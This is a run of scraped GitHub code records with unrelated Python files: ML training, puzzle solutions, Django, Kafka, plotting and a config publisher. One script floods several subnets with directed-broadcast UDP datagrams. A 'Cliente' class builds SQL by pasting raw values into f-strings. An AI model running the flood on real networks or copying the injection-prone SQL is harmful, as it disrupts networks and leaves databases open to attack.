datetime.utcnow().strftime('%Y%m%d%H%M%S')\n root_logdir = './tf_logs'\n if prefix:\n prefix += '-'\n name = prefix + 'run-' + now\n return '{}/{}/'.format(root_logdir, name)\n\n\nlogdir = log_dir('mnist_selu')\n\nfile_writer = tf.summary.FileWriter(logdir, tf.get_default_graph())\n\nX_valid = mnist.validation.images\ny_valid = mnist.validation.labels\n\nX_train = mnist.train.images\nX_test = mnist.test.images\ny_test = mnist.test.labels\nm, n = X_train.shape\n\ncheckpoint_path = '/home/light/tmp/my_deep_batch_norm_mnist.ckpt'\ncheckpoint_epoch_path = checkpoint_path + '.epoch'\nfinal_model_path = './my_deep_batch_norm_mnist'\n\nbest_loss = np.infty\nepochs_without_progress = 0\nmax_epoch_without_progress = 50\n\nn_epochs = 10001\nbatch_size = 50\nn_batches = int(np.ceil(m / batch_size))\n\nextra_update_pos = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\nwith tf.Session() as sess:\n if os.path.isfile(checkpoint_epoch_path):\n with open(checkpoint_epoch_path, 'rb') as f:\n start_epoch = int(f.read())\n print('Training was interrupted at :', start_epoch)\n saver.restore(sess, checkpoint_path)\n else:\n start_epoch = 0\n sess.run(init)\n\n for epoch in range(start_epoch, n_epochs):\n for iteration in range(mnist.train.num_examples // batch_size):\n X_batch, y_batch = mnist.train.next_batch(batch_size)\n sess.run([trainig_op, extra_update_pos],\n feed_dict={X: X_batch, y: y_batch})\n\n accuracy_val, loss_val, accuracy_summary_str, loss_summary_str = sess.run(\n [accuracy, loss, accuracy_summary, loss_summary], feed_dict={X: X_valid, y: y_valid})\n file_writer.add_summary(accuracy_summary_str, epoch)\n file_writer.add_summary(loss_summary_str, epoch)\n\n if epoch % 5 == 0:\n print('epoch', epoch,\n '\\tValidation Accuracy {:.3f}'.format(accuracy_val * 100),\n '\\t Loss {:.5f}'.format(loss_val))\n saver.save(sess, checkpoint_path)\n with open(checkpoint_epoch_path, 'wb') as f:\n f.write(b'%d' % (epoch + 1))\n if loss_val < best_loss:\n saver.save(sess, final_model_path)\n best_loss = loss_val\n else:\n epochs_without_progress += 5\n if epochs_without_progress > max_epoch_without_progress:\n print('early stopping at ', epoch)\n break\n\nos.remove(checkpoint_epoch_path)\n\nwith tf.Session() as sess:\n saver.restore(sess, final_model_path)\n accuracy_val = accuracy.eval(feed_dict={X: X_test, y: y_test})\n\naccuracy_val\n","repo_name":"machinedipto/machine_learning_projects","sub_path":"TensorFlow_examples/Batch_normalization.py","file_name":"Batch_normalization.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41691175569","text":"# BOJ_3613 : Java vs C++\r\nimport sys\r\n\r\n\r\ndef convert_type(string):\r\n pre_letter = string[0]\r\n if pre_letter.isupper() or pre_letter == \"_\" or string[-1] == \"_\":\r\n return 'Error!'\r\n\r\n snake_case, camelCase = False, False\r\n res_string = pre_letter\r\n for letter in string[1:]:\r\n # 타입관련 확인\r\n if not snake_case and letter == '_':\r\n snake_case = True\r\n if not camelCase and letter.isupper():\r\n camelCase = True\r\n if snake_case and camelCase:\r\n return 'Error!'\r\n\r\n # 이름 변환\r\n if pre_letter.isalpha() and letter == '_':\r\n pre_letter = letter\r\n continue\r\n elif pre_letter == '_' and letter == '_':\r\n return 'Error!'\r\n elif pre_letter == '_' and letter.islower():\r\n res_string += letter.upper()\r\n elif letter.isupper():\r\n res_string += '_' + letter.lower()\r\n else:\r\n res_string += letter\r\n\r\n pre_letter = letter\r\n\r\n return res_string\r\n\r\n\r\nname = list(str(sys.stdin.readline().rstrip()))\r\nconverted_name = convert_type(name)\r\n\r\nprint(converted_name)","repo_name":"Dachaes/BaekJoon","sub_path":"백준/Silver/3613. Java vs C++/Java vs C++.py","file_name":"Java vs C++.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23525210056","text":"import sys\r\n\r\nINPUT = sys.stdin.readline\r\n\r\n\r\ndef fibonacci(n: int):\r\n if n < 2:\r\n return n\r\n\r\n prev, curr = 0, 1\r\n for _ in range(n - 1):\r\n tmp = curr\r\n curr += prev\r\n prev = tmp\r\n return curr\r\n\r\n\r\nif __name__ == \"__main__\":\r\n n = int(INPUT())\r\n print(fibonacci(n))\r\n","repo_name":"Kdelphinus/Python_study","sub_path":"Baekjoon/bronze/bronze II/2747_fibonacci_number.py","file_name":"2747_fibonacci_number.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26628730428","text":"import sys, math\n\n\ninput = sys.stdin.readline\n\n\nT = int(input())\nfor _ in range(T) :\n H, W, N = map(int, input().split(' '))\n floor = N % H\n if (floor == 0) : floor = H\n room = math.ceil(N / H)\n if (room > 9) : print(str(floor) + str(room))\n else : print(str(floor) + '0' + str(room))","repo_name":"Marshal1101/Algorithm_BOJ_CLASS_1-5","sub_path":"CLASS_2++/003-10250-ACM호텔.py","file_name":"003-10250-ACM호텔.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32720509812","text":"class Cliente:\n def __init__(self, id, nome, cpf):\n self._id = id\n self._nome = nome\n self._cpf = cpf\n \n def imprimirCliente(self):\n\n print(f'''\n ID - {self._id}\n Nome - {self._nome}\n CPF - {self._cpf}\n ''')\n\n def consultarClientePorID(self):\n sql = f'''\n SELECT * FROM \"Cliente\"\n WHERE \"ID\" = '{self._id}'\n '''\n return sql\n\n def consultarAlugueis(self):\n sql = f'''\n SELECT * FROM \"Aluguel\"\n WHERE \"ID_Cliente\" = '{self._id}'\n '''\n return sql\n\n def inserirCliente(self):\n sql = f'''\n INSERT INTO \"Cliente\"\n VALUES(default, '{self._nome}', '{self._cpf}')\n \n '''\n\n return sql","repo_name":"TarikPonciano/Programador-de-Sistema-SENAC","sub_path":"Programador de Sistemas - UC 2/Repositório de Exemplos - Turma 1/Aula 06-02/Biblioteca/Modelo/classCliente.py","file_name":"classCliente.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"11052538254","text":"import numpy as np\n\ndef find_sigma(mtr,gamma=0.005):\n n_row,n_col = mtr.shape\n res = np.infty\n for i in range(n_row-1):\n for j in range(i+1,n_row):\n tp = min(-np.sum((mtr[i,:]-mtr[j,:])**2)/np.log(gamma),res)\n if tp !=0:\n res = tp\n return res\n\n","repo_name":"yalechang/multiview","sub_path":"utils/else_affinity_sigma.py","file_name":"else_affinity_sigma.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"616502932","text":"#!/usr/bin/python\n\"\"\" Send Directed Broadcasts, for example simulate EPICS traffic\n\nThis script sends some udp datagrams as directed broadcasts - use on your own risk\n\"\"\"\n\n__author__ = \"dumplab\"\n__copyright__ = \"2014 dumplab\"\n__license__ = \"MIT\"\n__version__ = \"1.0\"\n__status__ = \"Development\"\n\nimport multiprocessing\nimport socket\n\n# define broadcast addresses\nbcAddress = [\"172.16.0.255\",\"172.16.8.255\",\"172.16.40.255\"]\t# addresses, note router MUST be enabled to forward as l2 broadcasts \"ip directed-broadcast\"\nbcPort = 5064\t\t\t\t\t\t# udp destination port to use\nbcCount = 4096\t\t\t\t\t\t# datagrams we shall send\n\ndef udpFlood(myAddress):\n\t\"\"\"Send UDP datagram at fastest rate\"\"\"\n\tb = multiprocessing.current_process()\n\tprint(\"Sending \" + str(bcCount) + \" UDP message(s) to \" + str(SVI) + \":\" + str(bcPort) + \" PID(\" + str(b.pid) + \")\")\n\t# create socket\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\tfor x in range(bcCount):\n\t\tsock.sendto(\"its-not-the-network\",(myAddress,bcPort))\n\nfor SVI in bcAddress:\n\tp = multiprocessing.Process(target=udpFlood, args=(SVI,)).start()\n\n","repo_name":"dumplab/gittest","sub_path":"directed-broadcasts-sim.py","file_name":"directed-broadcasts-sim.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41763434261","text":"#!/usr/bin/env python\n\"\"\"\nIf no cache is found, will screape the ProgrammingPraxis website.\n\nOtherwise will output details of a dojo task.\n\nIf passed in the argument 'refresh', the script will scrape the\nProgrammingPraxis website for new tasks.\n\"\"\"\nimport sys\nimport random\nimport json\nimport requests\nimport html2text\nfrom bs4 import BeautifulSoup\n\n\ndef scrape(tasks):\n \"\"\"\n Scrapes ProgrammingPraxis for tasks, parses them and, if they don't already\n exist in the task list, adds them to it. At the end, saves the task list\n as a JSON file.\n \"\"\"\n known_tasks = set([task['url'].lower().strip() for task in tasks])\n target = 'http://programmingpraxis.com/page/{}/'\n counter = 0\n new_exercises = True\n while new_exercises:\n target_url = target.format(counter)\n response = requests.get(target_url)\n print('Grabbing URL: {}'.format(target_url))\n if counter == 0:\n # We get weird Wordpress errors for page 1. Go figure.\n counter = 1\n counter += 1\n if response.ok:\n soup = BeautifulSoup(response.text)\n exercises = soup.find_all('div', 'entry')\n for exercise in exercises:\n try:\n title = exercise.find('h2').text\n date = exercise.find('h3').text\n url = exercise.find('h2').find('a').attrs['href']\n h2t = html2text.HTML2Text()\n description = h2t.handle(exercise.find('div', 'entrybody').prettify())\n except Exception as ex:\n pass # Easiest to pass over malformed HTML for tasks.\n if url not in known_tasks:\n tasks.append({\n 'url': url,\n 'title': title,\n 'date': date,\n 'description': description,\n })\n known_tasks.add(url)\n else:\n new_exercises = False\n break\n print('Number of tasks scraped: {}'.format(len(tasks)))\n else:\n new_exercises = False\n break\n json.dump(tasks, open('tasks.json', 'wb'), indent=2)\n\n\nif __name__ == '__main__':\n refresh = False\n if len(sys.argv) > 1 and sys.argv[1] == 'refresh':\n refresh = True\n tasks = []\n try:\n tasks = json.load(open('tasks.json'))\n except:\n refresh = True\n if refresh:\n scrape(tasks)\n task = random.choice(tasks)\n print(task['title'] + '\\n')\n print(task['date'] + ' - ' + task['url'] + '\\n\\n')\n print(task['description'])\n","repo_name":"ntoll/dojotaskgen","sub_path":"taskgen.py","file_name":"taskgen.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"44211366632","text":"\"\"\"\nTest end to end django views.\n\"\"\"\nimport json\n\nfrom django.urls import reverse\nimport pytest\n\n\npytestmark = [\n pytest.mark.django_db,\n]\n\n\ndef test_index_view(client):\n \"\"\"Verify the index view is as expected\"\"\"\n response = client.get(reverse('main-index'))\n assert response.status_code == 200\n assert b\"Hi, I'm {{ cookiecutter.project_name }}\" in response.content\n\n\ndef test_webpack_url(mocker, settings, client):\n \"\"\"Verify that webpack bundle src shows up in production\"\"\"\n settings.GA_TRACKING_ID = 'fake'\n settings.ENVIRONMENT = 'test'\n settings.VERSION = '4.5.6'\n settings.USE_WEBPACK_DEV_SERVER = False\n get_bundle = mocker.patch('main.templatetags.render_bundle._get_bundle')\n\n response = client.get(reverse('main-index'))\n\n bundles = [bundle[0][1] for bundle in get_bundle.call_args_list]\n assert set(bundles) == {\n 'root',\n 'style',\n }\n js_settings = json.loads(response.context['js_settings_json'])\n assert js_settings == {\n 'gaTrackingID': 'fake',\n 'public_path': '/static/bundles/',\n 'environment': settings.ENVIRONMENT,\n 'sentry_dsn': \"\",\n 'release_version': settings.VERSION,\n }\n","repo_name":"mitodl/cookiecutter-djangoapp","sub_path":"{{ cookiecutter.project_name }}/main/views_test.py","file_name":"views_test.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"6160488153","text":"from rest_framework import serializers\nfrom login.serializers import UserSerializerList\n\nfrom repetory.models import Repertory\n\nclass RepertorySerializer(serializers.ModelSerializer):\n who_added = UserSerializerList()\n class Meta:\n model = Repertory\n fields = [\n 'id',\n 'music_name',\n 'music_artist',\n 'music_album',\n 'music_genre',\n 'created_at',\n 'who_added',\n ]\n","repo_name":"NickolasMuzzi/band-repetory","sub_path":"api/repetory/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72423302177","text":"## train, test 를 하나로 합치는 코드\nimport pandas as pd\n\n# *_2.csv는 공백줄 없이 저장한 csv\ndata = pd.read_csv(\"./mnist/train_2.csv\",header=None)\ntest = pd.read_csv(\"./mnist/t10k_2.csv\",header=None)\n\nall_data = []\nall_data.append(data)\nall_data.append(test)\ndata_concat = pd.concat(all_data)\ndata_concat.to_csv('./mnist/all_data.csv',index=False,header=0)","repo_name":"lululalamm/bigdata2019","sub_path":"03. AI/01. Machine Learning/all_data_mk.py","file_name":"all_data_mk.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31857568531","text":"#!/usr/bin/env python3\n\nfrom cassis import *\n\nif __name__ == \"__main__\":\n\n ts_file = open('TypeSystem.xml', 'rb')\n type_system = load_typesystem(ts_file)\n\n xmi_file = open('XmiSingleView/patientX_doc3_NOTE.txt.xmi', 'rb')\n cas = load_cas_from_xmi(xmi_file, typesystem=type_system)\n\n for sentence in cas.select('org.apache.ctakes.typesystem.type.textspan.Sentence'):\n print('\\nsentence:', sentence.get_covered_text())\n\n for token in cas.select_covered('org.apache.ctakes.typesystem.type.syntax.BaseToken', sentence):\n # for token in cas.select_covered('org.apache.ctakes.typesystem.type.syntax.WordToken', sentence):\n print('token:', token.get_covered_text())\n","repo_name":"dmitriydligach/Sandbox","sub_path":"Archive/PyCtakes/cas_single_view.py","file_name":"cas_single_view.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27621232832","text":"import pyqtgraph as pg\nfrom pyqtgraph.Qt import QtCore\nfrom models.line import get_line_params\nfrom models.point import Point\nfrom widgets.edit_bound_target_item_widget import EditBoundTargetItemWidget\n\n\nclass BoundTargetItem(pg.TargetItem):\n def __init__(\n self,\n curve: pg.PlotDataItem,\n pos=None,\n size=10,\n symbol=\"crosshair\",\n pen=None,\n hoverPen=None,\n brush=None,\n hoverBrush=None,\n movable=True,\n label=None,\n labelOpts=None,\n ):\n super().__init__(\n pos, size, symbol, pen, hoverPen, brush, hoverBrush, movable, label, labelOpts\n )\n\n self.__curve = curve\n self.__curve.sigPlotChanged.connect(self.update_pos)\n self.__edit_bound_target_item_widget = EditBoundTargetItemWidget()\n self.__metadata = \"\"\n self.__ox_fixation = False\n\n self.__edit_bound_target_item_widget.apply_signal.connect(self.__update_metadata)\n\n def fix_on_ox(self):\n self.__ox_fixation = True\n\n def free_movement_on_ox(self):\n self.__ox_fixation = False\n\n def update_pos(self):\n cp = self.__closest_point(self.pos())\n if self.__ox_fixation:\n self.setPos(\n QtCore.QPointF(self.pos().x(), cp.y())\n )\n else:\n self.setPos(cp)\n\n def mouseClickEvent(self, ev):\n if self.moving and ev.button() == QtCore.Qt.MouseButton.RightButton:\n ev.accept()\n self.moving = False\n self.sigPositionChanged.emit(self)\n self.sigPositionChangeFinished.emit(self)\n elif ev.button() == QtCore.Qt.MouseButton.LeftButton:\n self.__edit_bound_target_item_widget.metadata = self.__metadata\n self.__edit_bound_target_item_widget.show()\n\n def mouseDragEvent(self, ev):\n if not self.movable or ev.button() != QtCore.Qt.MouseButton.LeftButton:\n return\n ev.accept()\n if ev.isStart():\n self.moving = True\n\n if not self.moving:\n return\n\n pos = self.mapToView(ev.pos())\n new_pos = self.__closest_point(pos)\n\n if self.__ox_fixation:\n self.setPos(\n QtCore.QPointF(self.pos().x(), new_pos.y())\n )\n else:\n self.setPos(new_pos)\n\n if ev.isFinish():\n self.moving = False\n self.sigPositionChangeFinished.emit(self)\n\n def __update_metadata(self):\n self.__metadata = self.__edit_bound_target_item_widget.metadata\n\n def __closest_point(\n self,\n point: QtCore.QPointF\n ) -> QtCore.QPointF:\n \"\"\"\n Находит ближайшую точку на линии.\n \"\"\"\n\n bottom_closest_y_i, bottom_closest_y_d = 0, float('inf')\n for i, y in enumerate(self.__curve.yData):\n if y >= point.y():\n continue\n cdy_ = abs(y - point.y())\n if cdy_ < bottom_closest_y_d:\n bottom_closest_y_d = cdy_\n bottom_closest_y_i = i\n\n upper_closest_y_i, upper_closest_y_d = 0, float('inf')\n for i, y in reversed(list(enumerate(self.__curve.yData))):\n if y <= point.y():\n continue\n cdy_ = abs(y - point.y())\n if cdy_ < upper_closest_y_d:\n upper_closest_y_d = cdy_\n upper_closest_y_i = i\n\n line_params = get_line_params(\n Point(self.__curve.xData[bottom_closest_y_i], self.__curve.yData[bottom_closest_y_i]),\n Point(self.__curve.xData[upper_closest_y_i], self.__curve.yData[upper_closest_y_i]),\n )\n x = (-line_params[1] * point.y() - line_params[2]) / line_params[0]\n\n return QtCore.QPointF(x, point.y())\n\n @property\n def curve(self) -> pg.PlotDataItem:\n return self.__curve\n\n @property\n def metadata(self) -> str:\n return self.__metadata\n\n @metadata.setter\n def metadata(self, value):\n self.__metadata = value\n","repo_name":"kabanpunk/snippets","sub_path":"fastapi+vue/qt_graph/BoundTargetItem.py","file_name":"BoundTargetItem.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9613014386","text":"import base64\nimport logging\nimport os\nimport sys\n\nimport github\nfrom flask.cli import AppGroup\n\nfrom application.db.models import Collection, PublicationStatus\nfrom application.extensions import db\nfrom application.publish.models import (\n ColumnModel,\n CombineModel,\n ConcatModel,\n ConvertModel,\n DefaultModel,\n DefaultValueModel,\n EndpointModel,\n FilterModel,\n PatchModel,\n SkipModel,\n SourceModel,\n TransformModel,\n)\nfrom application.utils import csv_dict_to_string\n\nlogging.basicConfig(stream=sys.stdout)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\npublish_cli = AppGroup(\"publish\")\n\n\nPUBLISH_MODEL_CLASSES = {\n \"column\": ColumnModel,\n \"combine\": CombineModel,\n \"concat\": ConcatModel,\n \"conver\": ConvertModel,\n \"default\": DefaultModel,\n \"default_model\": DefaultValueModel,\n \"patch\": PatchModel,\n \"skip\": SkipModel,\n \"transform\": TransformModel,\n \"filter\": FilterModel,\n}\n\n\n@publish_cli.command(\"changes\")\ndef publish_config():\n app_id = os.getenv(\"GITHUB_APP_ID\")\n private_key = base64.b64decode(os.getenv(\"GITHUB_APP_PRIVATE_KEY\")).decode(\"utf-8\")\n branch = os.getenv(\"CONFIG_REPO_BRANCH\")\n\n g = github.GithubIntegration(app_id, private_key)\n token = g.get_access_token(g.get_installation(\"digital-land\", \"config\").id).token\n gh = github.Github(login_or_token=token)\n repo = gh.get_repo(\"digital-land/config\")\n\n for collection in Collection.query.order_by(Collection.name).all():\n if collection.publication_status == PublicationStatus.DRAFT:\n logger.info(f\"Publish sources and endpoints for {collection.collection}\")\n _publish_collection_config(collection, repo, branch)\n collection.publication_status = PublicationStatus.PUBLISHED\n db.session.add(collection)\n db.session.commit()\n else:\n logger.info(f\"Collection {collection.collection} has no updates to publish\")\n\n if collection.pipeline.publication_status == PublicationStatus.DRAFT:\n logger.info(\"Publish rules for pipeline\", collection.pipeline.pipeline)\n _publish_pipeline_config(collection.pipeline, repo, branch)\n collection.pipeline.publication_status = PublicationStatus.PUBLISHED\n db.session.add(collection)\n db.session.commit()\n else:\n logger.info(\n f\"Pipeline {collection.pipeline.pipeline} has no updates to publish\"\n )\n\n\ndef _publish_collection_config(collection, repo, branch_name):\n branch = repo.get_branch(branch_name)\n branch_sha = branch.commit.sha\n base_tree = repo.get_git_tree(sha=branch_sha)\n\n sources = []\n for source in collection.sources:\n sources.append(SourceModel.from_orm(source).dict(by_alias=True))\n\n data = csv_dict_to_string(sources)\n blob = repo.create_git_blob(data, \"utf-8\")\n\n path = f\"collection/{collection.collection}/source.csv\"\n source_element = github.InputGitTreeElement(\n path=path, mode=\"100644\", type=\"blob\", sha=blob.sha\n )\n\n endpoints = []\n for endpoint in collection.endpoints:\n endpoints.append(EndpointModel.from_orm(endpoint).dict(by_alias=True))\n\n data = csv_dict_to_string(endpoints)\n blob = repo.create_git_blob(data, \"utf-8\")\n\n path = f\"collection/{collection.collection}/endpoint.csv\"\n endpoint_element = github.InputGitTreeElement(\n path=path, mode=\"100644\", type=\"blob\", sha=blob.sha\n )\n\n tree = repo.create_git_tree([source_element, endpoint_element], base_tree)\n parent = repo.get_git_commit(sha=branch_sha)\n message = f\"Commit update of sources for {collection.collection}\"\n commit = repo.create_git_commit(message, tree, [parent])\n branch_refs = repo.get_git_ref(f\"heads/{branch_name}\")\n branch_refs.edit(sha=commit.sha)\n logger.info(f\"Commited collection config - commit sha: {commit.sha}\")\n\n\ndef _publish_pipeline_config(pipeline, repo, branch_name):\n branch = repo.get_branch(branch_name)\n branch_sha = branch.commit.sha\n base_tree = repo.get_git_tree(sha=branch_sha)\n elements = []\n\n for rule_type, rules in pipeline.get_pipeline_rules().items():\n if rules:\n to_publish = []\n publish_model = PUBLISH_MODEL_CLASSES.get(rule_type, None)\n if publish_model is None:\n logger.info(\n \"Can't publish rule type {{rule_type}}. No model defined yet\"\n )\n continue\n\n logger.info(f\"Publish {len(rules)} {rule_type} rules\")\n for rule in rules:\n to_publish.append(publish_model.from_orm(rule).dict(by_alias=True))\n\n data = csv_dict_to_string(to_publish)\n blob = repo.create_git_blob(data, \"utf-8\")\n\n path = f\"pipeline/{pipeline.pipeline}/{rule_type}.csv\"\n element = github.InputGitTreeElement(\n path=path, mode=\"100644\", type=\"blob\", sha=blob.sha\n )\n elements.append(element)\n else:\n logger.info(f\"No {rule_type} to publish for {pipeline.pipeline}\")\n\n if elements:\n tree = repo.create_git_tree(elements, base_tree)\n parent = repo.get_git_commit(sha=branch_sha)\n message = f\"Commit update of pipeline config for {pipeline.pipeline}\"\n commit = repo.create_git_commit(message, tree, [parent])\n branch_refs = repo.get_git_ref(f\"heads/{branch}\")\n branch_refs.edit(sha=commit.sha)\n logger.info(\n f\"Commited pipeline {pipeline.pipeline} config - commit sha: {commit.sha}\"\n )\n","repo_name":"digital-land/config-manager","sub_path":"application/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"44294670458","text":"class Ejecutor:\n def matar(self, proceso):\n if proceso['prioridad']==3 and proceso['consumo'] > 100:\n print('EjecutorNivel1 matará proceso %s' % proceso['nombre'])\n elif proceso['prioridad']==2 and proceso['consumo'] > 100:\n print('EjecutorNivel2 matará proceso %s' % proceso['nombre'])\n elif proceso['prioridad']==1 and proceso['consumo'] > 100:\n print('EjecutorNivel3 matará proceso %s' % proceso['nombre'])\n\ndef main():\n proceso = {\n \"prioridad\" : 2,\n \"nombre\" : \"Proceso de prueba\",\n \"consumo\" : 101\n }\n en = Ejecutor()\n en.matar(proceso)\n\nif __name__ == '__main__':\n main()\n","repo_name":"ulima-is2/pygames","sub_path":"repaso1/is2_ep/pregunta1.py","file_name":"pregunta1.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"37880282203","text":"import sys\nimport os\nimport unittest\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\nsys.path.append(\n os.path.abspath(os.path.dirname(\n os.path.dirname(\n __file__))))\n\nimport g4funcs as g4\n\n\nclass TestParseFasta(unittest.TestCase):\n\n def setUp(self):\n self.fasta_file = g4.FastaReader(StringIO('''\n>1\nATGTGTGAGTGTGTGAGTGTGTGTTTAGTGTTGAGAGT\nAGTAGTGAGTGTGCGCGGGAGAGTGTCGGTAGTGTGTG\nGATAGATAAGCTACGCATCAGCACATTATTATATATAT\nGGGGCAGCGAGCAGCAGTCAGCATAGCATCAGCATCAG\nAGTAGTCAG\n>2\nGGCATCGACTACGATGACGACATCGACTATCAGCATAC\nGACTAGCATCAGCAGCTACGCTAGGACTAGATCAGCAT\nCGTGCACGACTGATAGACTACGCTACGATCAGCT\n>3test\nGCATCAGCATCGATACTATTTATTATATATATTATATA\nGATAGCTATCTACTATATCATTAATATATT\n'''.strip()))\n self.seqs = [\n 'ATGTGTGAGTGTGTGAGTGTGTGTTTAGTGTTGAGAGT'\n 'AGTAGTGAGTGTGCGCGGGAGAGTGTCGGTAGTGTGTG'\n 'GATAGATAAGCTACGCATCAGCACATTATTATATATAT'\n 'GGGGCAGCGAGCAGCAGTCAGCATAGCATCAGCATCAG'\n 'AGTAGTCAG',\n 'GGCATCGACTACGATGACGACATCGACTATCAGCATAC'\n 'GACTAGCATCAGCAGCTACGCTAGGACTAGATCAGCAT'\n 'CGTGCACGACTGATAGACTACGCTACGATCAGCT',\n 'GCATCAGCATCGATACTATTTATTATATATATTATATA'\n 'GATAGCTATCTACTATATCATTAATATATT'\n ]\n self.seq_ids = ['1', '2', '3test']\n\n def test_parse_fasta(self):\n fasta_iter = self.fasta_file.parse_fasta()\n for test_id, test_seq, in zip(self.seq_ids, self.seqs):\n parsed_id, parsed_seq = next(fasta_iter)\n self.assertEqual(test_id, parsed_id)\n self.assertEqual(test_seq, parsed_seq)\n with self.assertRaises(StopIteration):\n next(fasta_iter)\n\n\nclass TestSortBed(unittest.TestCase):\n\n def setUp(self):\n unsorted_bed = [\n u'1\\t100\\t200\\ttest\\t10\\t-',\n u'1\\t0\\t100\\ttest\\t10\\t+',\n u'1\\t150\\t250\\ttest\\t10\\t-',\n u'2\\t150\\t250\\ttest\\t10\\t-',\n u'1\\t120\\t220\\ttest\\t10\\t+',\n u'1\\t10\\t110\\ttest\\t10\\t-',\n u'2\\t120\\t220\\ttest\\t10\\t-',\n ]\n with g4.BedWriter() as bed:\n for r in unsorted_bed:\n bed.write(r)\n self.unsorted_bed_fn = bed.fn\n self.sorted_bed = [\n u'1\\t0\\t100\\ttest\\t10\\t+',\n u'1\\t10\\t110\\ttest\\t10\\t-',\n u'1\\t100\\t200\\ttest\\t10\\t-',\n u'1\\t120\\t220\\ttest\\t10\\t+',\n u'1\\t150\\t250\\ttest\\t10\\t-',\n u'2\\t120\\t220\\ttest\\t10\\t-',\n u'2\\t150\\t250\\ttest\\t10\\t-',\n ]\n\n def test_sort_bed(self):\n sorted_output = list(g4.sort_bed_file(self.unsorted_bed_fn))\n self.assertEqual(sorted_output, self.sorted_bed)\n","repo_name":"mparker2/g4predict","sub_path":"tests/g4fileutils_test.py","file_name":"g4fileutils_test.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"} +{"seq_id":"43033450509","text":"from django.urls import path, include\nfrom . import views\nfrom django.conf.urls import url\n\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('beers/', views.beer_list, name='beer_list'),\n path('beers/tag//', views.beer_list, name='beer_list_by_tag'),\n path('beer/', views.beer_detail, name='beer-detail'),\n path('add_beer/', views.beer_create, name='beer_create'),\n path('edit_beer/', views.beer_edit, name='beer_edit'),\n path('delete_beer/', views.beer_delete, name='beer_delete'),\n path('like', views.like_beer, name='like_beer'),\n path('likes//', views.user_likes, name='user_likes'),\n path('users//', views.user_profile, name='user_profile'),\n path('delete_review/', views.review_delete, name='review_delete'),\n\n]\n","repo_name":"LWilsonDev/beer-list","sub_path":"beer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30719418687","text":"from confluent_kafka import Producer\nimport json\n\n# Kafka producer configuration\n_CONF = {\n 'bootstrap.servers': 'localhost:9092', # Replace with your Kafka broker(s) address\n 'client.id': 'my-producer'\n}\n\n\ndef get_producer():\n return Producer(_CONF)\n\n\ndef send_json_message(topic, json_data):\n producer = get_producer()\n try:\n # Produce the JSON message to the specified topic\n producer.produce(topic, key=None, value=json.dumps(json_data))\n producer.flush() # Ensure all messages are sent\n\n print(f\"Sent JSON message to topic {topic}: {json_data}\")\n except Exception as e:\n print(f\"Error sending message: {str(e)}\")\n","repo_name":"jahandaniyal/kafka-poc","sub_path":"kafka_producer.py","file_name":"kafka_producer.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2060363251","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom os import environ\n\nfrom telegram.ext import Updater, MessageHandler, CommandHandler, \\\n Filters, CallbackQueryHandler, ConversationHandler, \\\n InlineQueryHandler\n\n# Registro de actividades\nimport logging\n\n\nclass BotTelegram:\n \"\"\"Clase base para crear instancias de un Bot de Telegram\n\n >>> MiBot = BotTelegram(token)\n\n \"\"\"\n PORT = environ.get('PORT', 5000)\n\n def __init__(self, token, webhook=False, url=''):\n self.updater = Updater(token=token, use_context=True)\n # Dispatcher: está al pendiente de todas las ventanas donde se encuentra el bot.\n self.dispatcher = self.updater.dispatcher\n if webhook:\n self.updater.start_webhook(listen=\"0.0.0.0\",\n port=int(self.PORT),\n url_path=token)\n self.updater.bot.setWebhook(url + str(token))\n else:\n self.updater.start_polling()\n\n def 